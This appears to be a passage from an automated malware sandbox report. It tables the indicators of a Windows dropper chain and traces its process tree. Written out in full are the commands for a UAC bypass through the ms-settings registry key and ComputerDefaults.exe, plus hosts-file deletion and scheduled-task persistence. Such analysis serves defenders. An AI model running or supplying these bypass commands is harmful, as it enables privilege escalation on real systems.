Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	filer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	filer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	filer.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1188	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5152	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
4892	taskmgr.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2740	powershell.exe
2740	powershell.exe
4892	taskmgr.exe
4892	taskmgr.exe
2740	powershell.exe
1356	powershell.exe
1356	powershell.exe
4892	taskmgr.exe
4892	taskmgr.exe
1356	powershell.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
548	powershell.exe
548	powershell.exe
548	powershell.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
2108	UqhRb9F.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe
4232	filer.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
4892	taskmgr.exe
2108	UqhRb9F.exe
5732	OpenWith.exe
2176	OpenWith.exe
4272	New Text Document mod.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
2568	msedge.exe
2568	msedge.exe
2568	msedge.exe
2568	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4272	New Text Document mod.exe
Token: SeDebugPrivilege	2108	UqhRb9F.exe
Token: SeDebugPrivilege	4892	taskmgr.exe
Token: SeSystemProfilePrivilege	4892	taskmgr.exe
Token: SeCreateGlobalPrivilege	4892	taskmgr.exe
Token: SeDebugPrivilege	4232	filer.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	3868	wmic.exe
Token: SeSecurityPrivilege	3868	wmic.exe
Token: SeTakeOwnershipPrivilege	3868	wmic.exe
Token: SeLoadDriverPrivilege	3868	wmic.exe
Token: SeSystemProfilePrivilege	3868	wmic.exe
Token: SeSystemtimePrivilege	3868	wmic.exe
Token: SeProfSingleProcessPrivilege	3868	wmic.exe
Token: SeIncBasePriorityPrivilege	3868	wmic.exe
Token: SeCreatePagefilePrivilege	3868	wmic.exe
Token: SeBackupPrivilege	3868	wmic.exe
Token: SeRestorePrivilege	3868	wmic.exe
Token: SeShutdownPrivilege	3868	wmic.exe
Token: SeDebugPrivilege	3868	wmic.exe
Token: SeSystemEnvironmentPrivilege	3868	wmic.exe
Token: SeRemoteShutdownPrivilege	3868	wmic.exe
Token: SeUndockPrivilege	3868	wmic.exe
Token: SeManageVolumePrivilege	3868	wmic.exe
Token: 33	3868	wmic.exe
Token: 34	3868	wmic.exe
Token: 35	3868	wmic.exe
Token: 36	3868	wmic.exe
Token: SeIncreaseQuotaPrivilege	3868	wmic.exe
Token: SeSecurityPrivilege	3868	wmic.exe
Token: SeTakeOwnershipPrivilege	3868	wmic.exe
Token: SeLoadDriverPrivilege	3868	wmic.exe
Token: SeSystemProfilePrivilege	3868	wmic.exe
Token: SeSystemtimePrivilege	3868	wmic.exe
Token: SeProfSingleProcessPrivilege	3868	wmic.exe
Token: SeIncBasePriorityPrivilege	3868	wmic.exe
Token: SeCreatePagefilePrivilege	3868	wmic.exe
Token: SeBackupPrivilege	3868	wmic.exe
Token: SeRestorePrivilege	3868	wmic.exe
Token: SeShutdownPrivilege	3868	wmic.exe
Token: SeDebugPrivilege	3868	wmic.exe
Token: SeSystemEnvironmentPrivilege	3868	wmic.exe
Token: SeRemoteShutdownPrivilege	3868	wmic.exe
Token: SeUndockPrivilege	3868	wmic.exe
Token: SeManageVolumePrivilege	3868	wmic.exe
Token: 33	3868	wmic.exe
Token: 34	3868	wmic.exe
Token: 35	3868	wmic.exe
Token: 36	3868	wmic.exe
Token: SeIncreaseQuotaPrivilege	5052	wmic.exe
Token: SeSecurityPrivilege	5052	wmic.exe
Token: SeTakeOwnershipPrivilege	5052	wmic.exe
Token: SeLoadDriverPrivilege	5052	wmic.exe
Token: SeSystemProfilePrivilege	5052	wmic.exe
Token: SeSystemtimePrivilege	5052	wmic.exe
Token: SeProfSingleProcessPrivilege	5052	wmic.exe
Token: SeIncBasePriorityPrivilege	5052	wmic.exe
Token: SeCreatePagefilePrivilege	5052	wmic.exe
Token: SeBackupPrivilege	5052	wmic.exe
Token: SeRestorePrivilege	5052	wmic.exe
Token: SeShutdownPrivilege	5052	wmic.exe
Token: SeDebugPrivilege	5052	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
3692	AmLzNi.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
3692	AmLzNi.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
3588	chrome.exe
4892	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
3692	AmLzNi.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
4892	taskmgr.exe
3692	AmLzNi.exe
3692	AmLzNi.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe
4892	taskmgr.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
4232	filer.exe
2108	UqhRb9F.exe
5640	MSBuild.exe
4932	MSBuild.exe
4192	mspaint.exe
5732	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
2176	OpenWith.exe
1996	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4272 wrote to memory of 2108	4272	New Text Document mod.exe	84
PID 4272 wrote to memory of 2108	4272	New Text Document mod.exe	84
PID 4272 wrote to memory of 2108	4272	New Text Document mod.exe	84
PID 4272 wrote to memory of 968	4272	New Text Document mod.exe	87
PID 4272 wrote to memory of 968	4272	New Text Document mod.exe	87
PID 968 wrote to memory of 2800	968	fHR9z2C.exe	93
PID 968 wrote to memory of 2800	968	fHR9z2C.exe	93
PID 2800 wrote to memory of 3600	2800	cmd.exe	95
PID 2800 wrote to memory of 3600	2800	cmd.exe	95
PID 968 wrote to memory of 3840	968	fHR9z2C.exe	96
PID 968 wrote to memory of 3840	968	fHR9z2C.exe	96
PID 3840 wrote to memory of 4756	3840	cmd.exe	98
PID 3840 wrote to memory of 4756	3840	cmd.exe	98
PID 3840 wrote to memory of 944	3840	cmd.exe	99
PID 3840 wrote to memory of 944	3840	cmd.exe	99
PID 968 wrote to memory of 2588	968	fHR9z2C.exe	101
PID 968 wrote to memory of 2588	968	fHR9z2C.exe	101
PID 2588 wrote to memory of 4304	2588	cmd.exe	103
PID 2588 wrote to memory of 4304	2588	cmd.exe	103
PID 4304 wrote to memory of 4400	4304	ComputerDefaults.exe	104
PID 4304 wrote to memory of 4400	4304	ComputerDefaults.exe	104
PID 4400 wrote to memory of 2600	4400	wscript.exe	107
PID 4400 wrote to memory of 2600	4400	wscript.exe	107
PID 968 wrote to memory of 1016	968	fHR9z2C.exe	110
PID 968 wrote to memory of 1016	968	fHR9z2C.exe	110
PID 968 wrote to memory of 3224	968	fHR9z2C.exe	113
PID 968 wrote to memory of 3224	968	fHR9z2C.exe	113
PID 3224 wrote to memory of 716	3224	cmd.exe	115
PID 3224 wrote to memory of 716	3224	cmd.exe	115
PID 968 wrote to memory of 1636	968	fHR9z2C.exe	117
PID 968 wrote to memory of 1636	968	fHR9z2C.exe	117
PID 1636 wrote to memory of 432	1636	cmd.exe	119
PID 1636 wrote to memory of 432	1636	cmd.exe	119
PID 968 wrote to memory of 5084	968	fHR9z2C.exe	138
PID 968 wrote to memory of 5084	968	fHR9z2C.exe	138
PID 5084 wrote to memory of 4056	5084	cmd.exe	124
PID 5084 wrote to memory of 4056	5084	cmd.exe	124
PID 4272 wrote to memory of 4232	4272	New Text Document mod.exe	121
PID 4272 wrote to memory of 4232	4272	New Text Document mod.exe	121
PID 5084 wrote to memory of 3460	5084	cmd.exe	125
PID 5084 wrote to memory of 3460	5084	cmd.exe	125
PID 4232 wrote to memory of 2740	4232	filer.exe	126
PID 4232 wrote to memory of 2740	4232	filer.exe	126
PID 4272 wrote to memory of 3692	4272	New Text Document mod.exe	129
PID 4272 wrote to memory of 3692	4272	New Text Document mod.exe	129
PID 3692 wrote to memory of 1356	3692	AmLzNi.exe	130
PID 3692 wrote to memory of 1356	3692	AmLzNi.exe	130
PID 968 wrote to memory of 1592	968	fHR9z2C.exe	132
PID 968 wrote to memory of 1592	968	fHR9z2C.exe	132
PID 4232 wrote to memory of 548	4232	filer.exe	134
PID 4232 wrote to memory of 548	4232	filer.exe	134
PID 1592 wrote to memory of 3548	1592	cmd.exe	136
PID 1592 wrote to memory of 3548	1592	cmd.exe	136
PID 3548 wrote to memory of 1160	3548	ComputerDefaults.exe	137
PID 3548 wrote to memory of 1160	3548	ComputerDefaults.exe	137
PID 1160 wrote to memory of 5084	1160	wscript.exe	138
PID 1160 wrote to memory of 5084	1160	wscript.exe	138
PID 968 wrote to memory of 4148	968	fHR9z2C.exe	140
PID 968 wrote to memory of 4148	968	fHR9z2C.exe	140
PID 968 wrote to memory of 2488	968	fHR9z2C.exe	142
PID 968 wrote to memory of 2488	968	fHR9z2C.exe	142
PID 2488 wrote to memory of 1652	2488	cmd.exe	145
PID 2488 wrote to memory of 1652	2488	cmd.exe	145
PID 968 wrote to memory of 4788	968	fHR9z2C.exe	146

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2964
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6624
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3412
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Checks computer location settings
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
    "C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2108
- - C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2800
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3600
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4582.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3840
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4582.vbs" /f
        5⤵
        Modifies registry class
        
        PID:4756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:944
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2588
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4304
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\4582.vbs
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:2600
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\4582.vbs
      4⤵
      PID:1016
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3224
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:716
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:432
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7910.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5084
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7910.vbs" /f
        5⤵
        Modifies registry class
        
        PID:4056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:3460
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1592
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3548
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\7910.vbs
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1160
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5084
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\7910.vbs
      4⤵
      PID:4148
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2488
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:1652
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4788
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3612
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8053.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:3224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8053.vbs" /f
        5⤵
        Modifies registry class
        
        PID:3632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:3524
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:432
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:2416
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\8053.vbs
        6⤵
        
        PID:4344
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\8053.vbs
      4⤵
      PID:4760
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:932
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:1356
  - - C:\Windows\System32\print.exe
      "C:\Windows\System32\print.exe"
      4⤵
      PID:1260
- - C:\Users\Admin\AppData\Local\Temp\a\filer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
    3⤵
    - Executes dropped EXE
